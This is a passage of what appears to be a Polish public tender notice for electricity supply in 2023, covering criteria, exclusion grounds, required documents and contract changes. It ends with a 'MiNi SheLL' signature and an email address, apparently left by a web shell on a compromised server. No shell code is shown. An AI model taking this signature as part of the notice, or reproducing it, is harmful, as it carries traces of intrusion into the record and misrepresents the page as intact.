Dystrybucyjnego, zwanym dalej OSD. Zmiany w Umowie następować<br/>będą na pisemne zgłoszenie Zamawiającego do Wykonawcy począwszy od dokonania zmiany<br/>przez OSD. Powyższe zmiany będą przeprowadzone na zasadach określonych w taryfie<br/>operatora systemu dystrybucyjnego odpowiedniego dla Zamawiającego i będą dotyczyły, w<br/>szczególności zapewnienia danemu obiektowi poprawnego funkcjonowania (zgodne z jego<br/>przeznaczeniem) i/lub obniżenie kosztów na usłudze dystrybucji. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">65310000-9 - Przesył energii elektrycznej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">65300000-6 - Przesył energii elektrycznej i podobne usługi</p> <p class="mb-0">09000000-3 - Produkty naftowe, paliwo, energia elektryczna i inne źródła energii</p> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <p class="mb-0">09310000-5 - Elektryczność</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-01 do 2023-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki udziału w<br/>postępowaniu w zakresie:<br/>1. zdolności do występowania w obrocie gospodarczym: zamawiający nie stawia warunku w tym<br/>zakresie,<br/>2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika<br/>to z odrębnych przepisów:<br/>a) wykonawca winien posiadać uprawnienia do wykonywania działalności gospodarczej w<br/>zakresie obrotu energią elektryczną, na podstawie koncesji wydanej przez Prezesa Urzędu<br/>Regulacji Energetyki, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997 r. – Prawo energetyczne,<br/>b) w przypadku wspólnego ubiegania się wykonawców o zamówienie warunek z ppkt a) zostanie<br/>spełniony, jeżeli co najmniej jeden z wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej i<br/>zrealizuje dostawy, do których realizacji te uprawnienia są wymagane,<br/>3. sytuacji ekonomicznej lub finansowej: zamawiający nie stawia warunku w tym zakresie,<br/>4. zdolności technicznej lub zawodowej: zamawiający nie stawia warunku w tym zakresie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. W celu potwierdzenia<br/>braku podstaw wykluczenia, których mowa w Rozdziale 7 Zamawiający<br/>wezwie wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie,<br/>nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych<br/>aktualnych na dzień złożenia podmiotowych środków dowodowych:<br/>a) oświadczenia wykonawcy, w zakresie art. 108 ust. 1 pkt 5) Pzp, o braku przynależności do tej samej<br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów<br/>(Dz. U. z 2021 r. poz. 275), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o<br/>przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi<br/>przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej –<br/>oświadczenie wg wzoru stanowiącego załącznik nr 5 do SWZ,<br/>b) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4) Pzp, sporządzonych nie wcześniej niż 3<br/>miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji,</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. W<br/>celu potwierdzenia spełnienia warunków udziału w postępowaniu, o<br/>których mowa w Rozdziale 6 Zamawiający wezwie wykonawcę, którego oferta została najwyżej<br/>oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania,<br/>następujących podmiotowych środków dowodowych aktualnych na dzień złożenia podmiotowych<br/>środków dowodowych: koncesji do wykonywania działalności w zakresie obrotu gazem ziemnym,<br/>wydanej przez Prezesa Urzędu Regulacji Energetyki, zgodnie z art. 32 ustawy z dnia 10 kwietnia 1997<br/>r. – Prawo energetyczne.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Kompletna oferta zawiera:<br/>1.1. Formularz ofertowy – wg wzoru stanowiącego załącznik nr 3 do SWZ,<br/>1.2. Oświadczenie o niepodleganiu wykluczeniu oraz spełnieniu warunków w postępowaniu w<br/>zakresie wskazanym w Rozdziale 6 i 7 SWZ – wg wzoru stanowiącego załącznik nr 4 do SWZ, 1.3. Pełnomocnictwo lub inny<br/>dokument potwierdzający umocowanie do reprezentowania<br/>wykonawcy - jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego<br/>reprezentowania nie wynika z dokumentów rejestrowych. Warunek ten dotyczy również<br/>odpowiednio osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego oraz podwykonawców. Pełnomocnictwo to musi w swej treści<br/>jednoznacznie wskazywać uprawnienie do podpisania oferty. Umocowanie wymagane jest na<br/>każdym etapie prowadzonego postępowania,<br/>1.4. Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej lub innego właściwego rejestru (jeżeli dotyczy) - w celu<br/>potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego<br/>reprezentowania, sporządzone nie wcześniej niż 3 miesiące przed ich złożeniem. Jeżeli<br/>Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej,<br/>zamiast w/w dokumentów składa dokument lub dokumenty wystawione w kraju, w którym<br/>wykonawca ma siedzibę lub miejsce zamieszkania (wykonawca może wskazać w ofercie adresy<br/>internetowe ogólnodostępnych i bezpłatnych baz danych, z których zamawiający będzie mógł<br/>pobrać dokumenty wymienione w ppkt 1.4.),<br/>1.5. Oświadczenie, z którego wynika, które dostawy wykonają poszczególni wykonawcy<br/>wspólnie ubiegający się o udzielenie zamówienia - wg wzoru stanowiącego załącznik nr 6 do<br/>SWZ (jeżeli dotyczy),<br/>1.6. Zastrzeżenie tajemnicy przedsiębiorstwa – jeżeli dotyczy.<br/>2. Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza granicami Rzeczypospolitej<br/>Polskiej, zamiast dokumentów, o których mowa w.:<br/>2.1. zaświadczenia, o którym mowa w pkt 9.2.3. SWZ - składa dokument lub dokumenty<br/>wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania,<br/>potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono upadłości, jego<br/>aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność<br/>gospodarcza nie jest zawieszona, ani nie znajduje się on w innej tego rodzaju sytuacji<br/>wynikającej z podobnej procedury przewidzianej w przepisach miejsca wszczęcia tej procedury<br/>– dokument/-ty powinien być wystawiony nie wcześniej niż 3 miesiące przed ich złożeniem.<br/>2.2. jeżeli w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się<br/>dokumentów, o których mowa w pkt 9.10.1. SWZ, zastępuje się je odpowiednio w całości lub w<br/>części dokumentem zawierającym odpowiednio oświadczenie wykonawcy, ze wskazaniem<br/>osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument<br/>miał dotyczyć, złożone pod przysięgą, lub, jeżeli w kraju, w którym wykonawca ma siedzibę lub<br/>miejsce zamieszkania nie ma przepisów o oświadczeniu pod przysięgą, złożone przed organem<br/>sądowym lub administracyjnym, notariuszem, organem samorządu zawodowego lub<br/>gospodarczego, właściwym ze względu na siedzibę lub miejsce zamieszkania<br/>wykonawcy.Dokumenty powinny być wystawione analogicznie jak dla dokumentów<br/>wymienionych w ppkt<br/>9.10.1. SWZ<br/>2.3. Do podmiotów udostępniających zasoby na zasadach art. 118 Pzp, mających siedzibę lub<br/>miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, postanowienia pkt 9.10. SWZ<br/>stosuje się odpowiednio.<br/>3. 3. Pełna informacja o wymaganych oświadczeniach oraz dokumentach zawarta jest w SWZ w<br/>Dziale 9. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:<br/>1.1. nie podlegają wykluczeniu,<br/>1.2. spełniają warunki udziału w postępowaniu, o ile zostały one określone przez<br/>zamawiającego.<br/>2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>3. W przypadku, o którym mowa w pkt 8.2. wykonawcy ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>4. Żaden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia nie może podlegać<br/>wykluczeniu z postępowania. W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia warunki udziału w postępowaniu określone w Rozdziale 6 powinni spełniać łącznie wszyscy<br/>Wykonawcy, z zastrzeżeniem zapisu w pkt 6.1.2. lit b).<br/>5. W odniesieniu do warunków dotyczących kwalifikacji zawodowych lub doświadczenia<br/>wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach<br/>tych z wykonawców, którzy wykonają dostawy, do realizacji których te zdolności są wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do<br/>oferty oświadczenie z którego wynika, które dostawy wykonają poszczególni wykonawcy<br/>(oświadczenie wg wzoru stanowiącego załącznik nr 6 do SWZ). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia:<br/>1. Zgodnie z treścią art. 455 ust. 1 pkt 1 ustawy Pzp Zamawiający dopuszcza wprowadzenie<br/>zmian postanowień Umowy w stosunku do treści oferty, w zakresie:<br/>1.1 zmiany ceny jednostkowej energii elektrycznej netto za 1 kWh wyłącznie w przypadku<br/>ustawowej zmiany opodatkowania energii elektrycznej podatkiem akcyzowym, o kwotę<br/>wynikającą ze zmiany tej stawki,<br/>1.2) zmiany ceny jednostkowej za 1 kWh brutto wynikającej z ustawowej zmiany stawki podatku<br/>VAT, o kwotę wynikającą ze zmiany tej stawki,<br/>1.3 zaistnienia okoliczności (technicznych, gospodarczych, prawnych itp.), których nie można<br/>było przewidzieć w chwili zawarcia Umowy - zmiany te mogą spowodować zmianę ilości<br/>punktów PPE, grupy taryfowej lub wartości zawartej Umowy,<br/>1.4 zmian spowodowanych siłą wyższą uniemożliwiających wykonanie przedmiotu Umowy, przy<br/>czym przez siłę wyższą Strony rozumieją zdarzenie o charakterze przypadkowym lub<br/>naturalnym, ale zawsze o charakterze zewnętrznym w stosunku do człowieka, zdarzenie<br/>niemożliwe (lub prawie niemożliwe) do przewidzenia, zdarzenie, którego skutkom nie można<br/>zapobiec, w szczególności działania sił przyrody (np. powodzie, trzęsienia ziemi, huragany),<br/>zaburzenia życia zbiorowego (działania wojenne, zamieszki wewnętrzne, strajk, epidemie), akty<br/>władzy państwowej (akty władzy ustawodawczej lub administracyjnej, które czynią niemożliwym<br/>wykonanie danego zobowiązania) – zmiany te mogą spowodować zmianę ilości punktów PPE,<br/>grupy taryfowej lub wartości zawartej Umowy,<br/>1.5 zmiany sposobu wykonania Przedmiotu Umowy w przypadku zmiany regulacji prawnych<br/>odnoszących się do praw i obowiązków Stron Umowy, wprowadzonych po zawarciu Umowy,<br/>wywołujących niezbędną potrzebę zmiany sposobu realizacji Umowy, w tym regulacji prawnych,<br/>na podstawie ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z<br/>zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych - zmiany te mogą spowodować zmianę ilości punktów<br/>PPE, grupy taryfowej lub wartości zawartej Umowy.<br/>2. Zgodnie z art. 436 pkt 4 lit. b ustawy Pzp Zamawiający dopuszcza wprowadzenie zmian w<br/>Umowie dotyczących wynagrodzenia należnego Wykonawcy w przypadku zmiany:<br/>2.1 wysokości minimalnego wynagrodzenia za pracę albo wysokości minimalnej stawki<br/>godzinowej, ustalonych na podstawie przepisów ustawy z dnia 10 października 2002 r. o<br/>minimalnym wynagrodzeniu za pracę – o wartość wynikającą z tych zmian na zasadach<br/>opisanych w umowie,<br/>2.2 zasad podlegania ubezpieczeniom społecznym lub ubezpieczeniu zdrowotnemu lub<br/>wysokości stawki składki na ubezpieczenie społeczne lub zdrowotne – o wartość wynikającą z<br/>tych zmian na zasadach opisanych w umowie,<br/>2.3 zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, o których<br/>mowa w ustawie z dnia 4 października 2018 r. (Dz. U. z 2020 r. poz. 1342) o pracowniczych<br/>planach kapitałowych – o wartość wynikającą z tych zmian na zasadach opisanych w umowie,<br/>- jeżeli zmiany te będą miały wpływ na koszty wykonania zamówienia przez Wykonawcę.<br/>3. Zamawiający dopuszcza zmiany w umowie określone jako nieistotne:<br/>3.1. zmiany miejsca realizacji umowy pod warunkiem, że nowa lokalizacja będzie spełniała<br/>wymagania określone w SWZ,<br/>3.2. zmiany danych teleadresowych stron umowy lub innych danych zawartych w rejestrach<br/>publicznych.<br/>Szczegółowy zakres zmian zawarto w zał. nr 2 do SWZ - tj. projektowane postanowienia umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-22 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/zblewo</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-22 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-20</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h3 class="mb-0">8.7) Kryteria oceny ofert, które zamawiający zamierza stosować w celu ograniczenia liczby wykonawców: </h3> 3.1. Postępowanie o udzielenie zamówienia publicznego prowadzone jest w trybie podstawowym, na podstawie art. 275 pkt<br/>2 ustawy z dnia 11 września 2019 r. - Prawo zamówień publicznych<br/>(Dz. U. z 2021 r., poz. 1129 ze zm.) zwanej dalej „ustawą Pzp&#34;, oraz aktów wykonawczych do ustawy.<br/>3.1.1. Prowadzenie procedury w przypadku fakultatywnych negocjacji:<br/>1) Zamawiający przeprowadzi negocjacje z wszystkimi wykonawcami, którzy złożyli niepodlegające odrzuceniu oferty w<br/>odpowiedzi na ogłoszenie o zamówieniu.<br/>2) Zamawiający informuje, że negocjacje treści ofert:<br/> nie mogą prowadzić do zmiany treści SWZ,<br/> dotyczyć będą wyłącznie tych elementów treści ofert, które podlegają ocenie<br/>w ramach kryteriów oceny ofert.<br/>3) Zamawiający w zaproszeniu do negocjacji wskaże miejsce, termin i sposób prowadzenia negocjacji oraz kryteria oceny<br/>ofert, w ramach których będą prowadzone negocjacje w celu ulepszenia treści ofert.<br/>4) Podczas negocjacji ofert Zamawiający zapewnia równe traktowanie wszystkich wykonawców. Prowadzone negocjacje<br/>mają charakter poufny. Żadna ze stron nie może, bez zgody drugiej strony, ujawniać informacji technicznych i handlowych<br/>związanych z negocjacjami. Zgoda jest udzielana w odniesieniu do konkretnych informacji i przed ich ujawnieniem.<br/>5) Zamawiający nie udziela informacji w sposób, który mógłby zapewnić niektórym wykonawcom przewagę nad innymi<br/>wykonawcami.<br/>6) Po zakończeniu negocjacji, Zamawiający informuje równocześnie wszystkich wykonawców, których oferty złożone w<br/>odpowiedzi na ogłoszenie nie zostały odrzucone o zakończeniu negocjacji oraz zaprasza ich do składania ofert<br/>dodatkowych.

Creat By MiNi SheLL
Email: jattceo@gmail.com